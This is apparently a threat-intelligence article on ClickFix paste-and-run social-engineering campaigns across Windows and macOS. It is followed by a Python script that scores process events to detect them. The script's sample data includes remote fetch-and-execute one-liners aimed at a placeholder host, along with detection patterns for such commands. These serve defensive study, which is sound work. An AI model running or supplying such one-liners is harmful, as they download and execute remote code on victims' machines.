The term ClickFix refers to a growing trend in social engineering in which a user is tricked, one way or another, into "fixing" a supposed problem. In such cases, the "fix" the user performs actually executes malicious actions. ClickFix tactics, while not new, have become one of the most widely used initial access methods in the last year.
Some examples of how this might look are shown below. This example shows a compromised iClicker verification page, where the user is prompted to perform a couple of steps to complete verification. What actually happens is that the user is given a shell script to paste into the Windows Run box, which then downloads a secondary PowerShell script from a remote server.
As we can see, victims of these attacks are typically presented with convincing prompts, such as a fake CAPTCHA, a browser error, or some sort of security warning. These are followed by instructions prompting them to do things like paste code into a terminal or download a file. It is these actions that initiate the malicious activity, such as payload downloading, credential harvesting, or establishing remote access.
The trouble with ClickFix attacks is that they do not rely on software vulnerabilities. Instead, they take a social engineering approach, exploiting user trust and familiar patterns like having to perform an annoying action to complete a verification. These kinds of user-assisted attacks can be highly scalable, especially in the case of infostealer propagation, since the information gained in those cases can then be leveraged to do secondary damage.
ClickFix attacks are becoming popular for targeting both Windows and macOS environments. One of the more notable developments is Apple's recent security update to the Terminal application, which specifically targets this kind of attack by warning users when they attempt to paste potentially dangerous commands into the terminal. An example of that is shown below.
[Image: macOS Terminal paste warning] (Source: Risky Business)
Unfortunately, there are several other ClickFix campaigns targeting macOS environments, including ones intended to deliver other infostealers such as MacSync. Sometimes these payloads are disguised as developer tools or AI-related software, with the malicious installation pages hosted on otherwise legitimate platforms like Cloudflare Pages or Squarespace.
On the Windows side, ClickFix attacks have evolved in their execution. Previous campaigns relied on having the user paste shell instructions into the Windows Run dialog, as mentioned a moment ago, but campaigns now appear to be directing users to use Windows Terminal instead. ClickFix tactics are also being used in a new campaign to distribute a previously undocumented malware loader known as DeepLoad.
To make matters feel a little worse, the Insikt Group at Recorded Future has identified five different clusters of ClickFix activity based on their patterns and targeting approaches. The QuickBooks group uses targeted impersonation of accounting software; the Booking.com group uses fraudulent domains to fake verification portals; the Birdeye group directly targets users of the Birdeye AI marketing company; the Dual-Platform group uses OS detection to deliver platform-specific payloads; and the macOS Storage group uses prompts mimicking macOS system optimization tools.
One prevalent takeaway from the rise of ClickFix attacks is an apparent evolution in how attackers aim to achieve initial access. This is clear given that user-assisted methods now often outperform traditional exploit-dependent approaches. What's more, the user-assisted approach may also be more reliable, since it relies only on legitimate tools and user-approved actions.
ClickFix attacks also show cross-platform adaptability, particularly where campaigns belong to the Dual-Platform group mentioned earlier and tailor their actions to whatever operating system the victim is using.
As far as detection is concerned, it's important to understand that copy-and-paste methods of command execution introduce new challenges, since proper context is required to distinguish malicious actions from legitimate user behavior.
Ultimately, ClickFix attacks take the social engineering angle more seriously than some other types of attacks, in the sense that campaigns are designed to require minimal technical sophistication yet yield relatively high success rates because they leverage human behavior instead.
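One way to supply that context, as an added example that is not from the article: score process-creation events so that a remote fetch-and-execute one-liner is only alerted on when it was launched from a paste target (the Run box via explorer.exe, Windows Terminal, or the macOS Terminal). The event fields, parent-process names, thresholds and the sample events are all constructed assumptions.

```python
"""Context-aware triage of process-creation events for ClickFix-style
paste-and-run execution. Sample data is constructed, not real telemetry."""
import re

# Interactive launchers a victim pastes into (assumed process names):
# Run box (parent explorer.exe), Windows Terminal, macOS Terminal/iTerm2.
PASTE_PARENTS = {"explorer.exe", "windowsterminal.exe", "terminal", "iterm2"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "bash", "zsh", "sh"}

# Signals that the pasted command fetches remote content and runs it inline.
FETCH = re.compile(r"(invoke-webrequest|\biwr\b|\birm\b|downloadstring|net\.webclient"
                   r"|\bcurl\b|\bwget\b|mshta\s+https?:)", re.I)
EXEC = re.compile(r"(\biex\b|invoke-expression|\|\s*(ba|z)?sh\b|-enc(odedcommand)?\b)", re.I)
HIDE = re.compile(r"(-w(indowstyle)?\s+hidden|-nop\b|-noprofile|-ep\s+bypass)", re.I)
URL = re.compile(r"https?://[^\s'\"]+", re.I)

def score_event(ev):
    """Return (score, reasons). A fetch alone is what a developer might type;
    the paste-launcher parent is the context that makes it ClickFix-like."""
    reasons, score = [], 0
    if ev["image"].lower() not in SHELLS:
        return 0, reasons
    cmd = ev["cmdline"]
    if ev["parent"].lower() in PASTE_PARENTS:
        score += 2; reasons.append(f"shell spawned by paste launcher {ev['parent']}")
    if FETCH.search(cmd):
        score += 2; reasons.append("remote fetch in command line")
    if EXEC.search(cmd):
        score += 2; reasons.append("fetched content executed inline")
    if HIDE.search(cmd):
        score += 1; reasons.append("window hiding / policy bypass flag")
    urls = URL.findall(cmd)
    if urls:
        reasons.append("url=" + urls[0])
    return score, reasons

def triage(events, threshold=5):
    """Events at or above the threshold are alerts worth an analyst's look."""
    alerts = []
    for ev in events:
        s, why = score_event(ev)
        if s >= threshold:
            alerts.append({"id": ev["id"], "score": s, "reasons": why})
    return alerts

SAMPLE_EVENTS = [  # constructed; example.invalid is a placeholder host
    {"id": 1, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell -w hidden -c \"iex (iwr 'https://example.invalid/v.ps1')\""},
    {"id": 2, "parent": "WindowsTerminal.exe", "image": "pwsh.exe",
     "cmdline": "pwsh -c \"Invoke-WebRequest https://example.invalid/t.zip -OutFile t.zip\""},
    {"id": 3, "parent": "svchost.exe", "image": "powershell.exe",
     "cmdline": "powershell -NoProfile -File C:\\Scripts\\backup.ps1"},
    {"id": 4, "parent": "Terminal", "image": "bash",
     "cmdline": "bash -c \"curl -fsSL https://example.invalid/setup.sh | bash\""},
]
```

Running `triage(SAMPLE_EVENTS)` alerts only on events 1 and 4: the plain download in event 2 and the scheduled script in event 3 stay below the threshold because they lack either the inline execution or the paste-launcher parent.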
Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. We provide indicators-of-compromise information via a notification service (RedXray) or an analysis service (CTAC). For questions, comments, or assistance, please contact the office directly at 1-844-492-7225 or feedback@redskyalliance.com